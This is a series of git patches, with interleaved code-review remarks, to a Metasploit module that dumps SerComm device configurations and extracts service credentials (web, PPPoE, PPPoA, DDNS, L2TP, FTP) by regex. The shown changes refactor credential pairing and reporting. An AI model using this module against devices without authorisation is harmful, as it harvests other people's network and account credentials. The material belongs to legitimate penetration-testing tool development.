From 42fb8c48d17a2faae7d8bd52e798e6166b135efe Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Mon, 13 Jan 2014 22:57:25 -0500 Subject: [PATCH 1/4] Fixed the credential parsing and made output consistent So in the previous refactor, we made the dedicated method to parse usernames and passwords from the split up config values. However, that didn't work, because on a single iteration of the loop, you only have access to a possible username OR password. The other matching key will be another iteration of the loop. Because of this, no credential pairs were being reported. The only way I can see around this (maybe because I'm a ruby newb) would be to iterate over configs, and if the user or password regex matches, add the matching value to a hash, which is identified by a key for both user & pass. Then upon completion of the loop, it'd iterate over the hash, finding keys that had both user & pass values. --- .../admin/misc/sercomm_dump_config.rb | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index a95bfd4994..e938bd5064 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb 
@@ -185,33 +185,34 @@ class Metasploit3 < Msf::Auxiliary configs.each do |config| parse_general_config(config) - parse_auth_config(config) end + parse_auth_config(configs) end def parse_general_config(config) SETTINGS['General'].each do |regex| if config.match(regex[1]) value = $1 - print_status("#{regex[0]}: #{value}") + print_status("#{peer} - #{regex[0]}: #{value}") end end end - def parse_auth_config(config) + def parse_auth_config(configs) SETTINGS['Creds'].each do |cred| user = nil pass = nil # find the user/pass - if config.match(cred[1]['user']) - user = $1 + u = configs.grep(cred[1]['user']) { $1 } + if u.any? + user = u[0] end - if config.match(cred[1]['pass']) - pass = $1 + p = configs.grep(cred[1]['pass']) { $1 } + if p.any? + pass = p[0] end - # if user and pass are specified, report on them if user and pass print_status("#{peer} - #{cred[0]}: User: #{user} Pass: #{pass}") auth = { @@ -225,6 +226,7 @@ class Metasploit3 < Msf::Auxiliary } report_auth_info(auth) end + end end From 2d40f936e313d86f2df51183007d2c1da03cdbb0 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Mon, 13 Jan 2014 23:15:51 -0500 Subject: [PATCH 2/4] Added some additional creds that were useful --- modules/auxiliary/admin/misc/sercomm_dump_config.rb | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index e938bd5064..ee3a7d27c1 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb 
@@ -14,8 +14,14 @@ class Metasploit3 < Msf::Auxiliary SETTINGS = { 'Creds' => [ [ 'HTTP Web Management', { 'user' => /http_username=(\S+)/i, 'pass' => /http_password=(\S+)/i } ], + [ 'HTTP Web Management', { 'user' => /login_username=(\S+)/i, 'pass' => /login_password=(\S+)/i } ], [ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ], + [ 'PPPoA', { 'user' => /pppoa_username=(\S+)/i, 'pass' => /pppoa_password=(\S+)/i } ], [ 'DDNS', { 'user' => /ddns_user_name=(\S+)/i, 'pass' => /ddns_password=(\S+)/i } ], + [ 'CMS', {'user' => /cms_username=(\S+)/i, 'pass' => /cms_password=(\S+)/i } ], # Found in some cameras + [ 'BigPondAuth', {'user' => /bpa_username=(\S+)/i, 'pass' => /bpa_password=(\S+)/i } ], # Telstra + [ 'L2TP', { 'user' => /l2tp_username=(\S+)/i, 'pass' => /l2tp_password=(\S+)/i } ], + [ 'FTP', { 'user' => /ftp_login=(\S+)/i, 'pass' => /ftp_password=(\S+)/i } ], ], 'General' => [ ['Wifi SSID', /wifi_ssid=(\S+)/i], From 6372ae6121841ce72640517f279d96afe1705806 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 14 Jan 2014 17:00:00 -0600 Subject: [PATCH 3/4] Save some parsing --- .../admin/misc/sercomm_dump_config.rb | 53 ++++++++++--------- 1 file changed, 28 insertions(+), 25 deletions(-) diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index ee3a7d27c1..95ebab722b 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb 
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary SETTINGS = { 'Creds' => [ [ 'HTTP Web Management', { 'user' => /http_username=(\S+)/i, 'pass' => /http_password=(\S+)/i } ], - [ 'HTTP Web Management', { 'user' => /login_username=(\S+)/i, 'pass' => /login_password=(\S+)/i } ], + [ 'HTTP Web Management Login', { 'user' => /login_username=(\S+)/i, 'pass' => /login_password=(\S+)/i } ], [ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ], [ 'PPPoA', { 'user' => /pppoa_username=(\S+)/i, 'pass' => /pppoa_password=(\S+)/i } ], [ 'DDNS', { 'user' => /ddns_user_name=(\S+)/i, 'pass' => /ddns_password=(\S+)/i } ], @@ -33,6 +33,7 @@ class Metasploit3 < Msf::Auxiliary } attr_accessor :endianess + attr_accessor :credentials def initialize(info={}) super(update_info(info, @@ -63,7 +64,9 @@ class Metasploit3 < Msf::Auxiliary def run print_status("#{peer} - Attempting to connect and check endianess...") - @endianess = fingerprint_endian + #@endianess = fingerprint_endian + @endianess = 'BE' + @credentials = {} if endianess.nil? print_error("Failed to check endianess, aborting...") @@ -191,8 +194,24 @@ class Metasploit3 < Msf::Auxiliary configs.each do |config| parse_general_config(config) + parse_auth_config(config) end - parse_auth_config(configs) + + @credentials.each do |k,v| + next unless v[:user] and v[:password] + print_status("#{peer} - #{k}: User: #{v[:user]} Pass: #{v[:password]}") + auth = { + :host => rhost, + :port => rport, + :user => v[:user], + :pass => v[:password], + :type => 'password', + :source_type => "exploit", + :active => true + } + report_auth_info(auth) + end + end def parse_general_config(config) 
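Review bot: `attr_accessor :credentials` exposes a public writer that nothing in the series uses; the hash is assigned once in `run` and mutated in place by `parse_auth_config`, so `attr_reader :credentials` is the narrower interface. That also matches how `endianess` is used in the visible hunks, where it is read through its accessor but only ever written via the instance variable. The class body continues outside the hunk.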
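Review bot: The `next unless v[:user] and v[:password]` guard silently drops any entry whose counterpart key is absent from the dump, so a `*_password=` value with a fixed or missing username never reaches the operator; a `vprint_status("#{peer} - #{k}: incomplete credential pair #{v.inspect}")` before the `next` would surface it without writing it to the database. In the guard prefer `&&` over `and` — it parses correctly here, but `and` is the low-precedence control-flow form and RuboCop will flag it. Separately, `:active => true` asserts a working credential although nothing in this module has authenticated with it; if `report_auth_info` treats that flag as "verified", consider leaving it at the default. The enclosing method starts outside the hunk.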
@@ -204,33 +223,17 @@ class Metasploit3 < Msf::Auxiliary end end - def parse_auth_config(configs) + def parse_auth_config(config) SETTINGS['Creds'].each do |cred| - user = nil - pass = nil + @credentials[cred[0]] = {} unless @credentials[cred[0]] # find the user/pass - u = configs.grep(cred[1]['user']) { $1 } - if u.any? - user = u[0] - end - p = configs.grep(cred[1]['pass']) { $1 } - if p.any? - pass = p[0] + if config.match(cred[1]['user']) + @credentials[cred[0]][:user] = $1 end - if user and pass - print_status("#{peer} - #{cred[0]}: User: #{user} Pass: #{pass}") - auth = { - :host => rhost, - :port => rport, - :user => user, - :pass => pass, - :type => 'password', - :source_type => "exploit", - :active => true - } - report_auth_info(auth) + if config.match(cred[1]['pass']) + @credentials[cred[0]][:password] = $1 end end From 0b1671f1b83bd3ea466756cca4155778b57c686c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 14 Jan 2014 17:02:30 -0600 Subject: [PATCH 4/4] Undo debugging comment --- modules/auxiliary/admin/misc/sercomm_dump_config.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 95ebab722b..35f7127993 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -64,8 +64,7 @@ class Metasploit3 < Msf::Auxiliary def run print_status("#{peer} - Attempting to connect and check endianess...") - #@endianess = fingerprint_endian - @endianess = 'BE' + @endianess = fingerprint_endian @credentials = {} if endianess.nil?
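Review bot: The reason `parse_auth_config` now only records matches and leaves reporting to the caller is not visible in the code — the username and password of one service arrive in separate config entries, so a pair can only be judged after the whole list has been walked; a comment such as `# user/pass live in separate config entries; the caller pairs them once every entry has been parsed` above `SETTINGS['Creds'].each` would stop the next refactor from reintroducing the per-entry check this series just removed. Note the accumulation is last-match-wins: if the same key occurs in more than one entry the later value overwrites the earlier one, whereas the replaced `grep` version kept the first, which may or may not matter for this dump format. `@credentials[cred[0]] = {} unless @credentials[cred[0]]` reads better as `@credentials[cred[0]] ||= {}`, and `Regexp.last_match(1)` is clearer than `$1`. The method's closing `end` appears to fall outside the visible hunk.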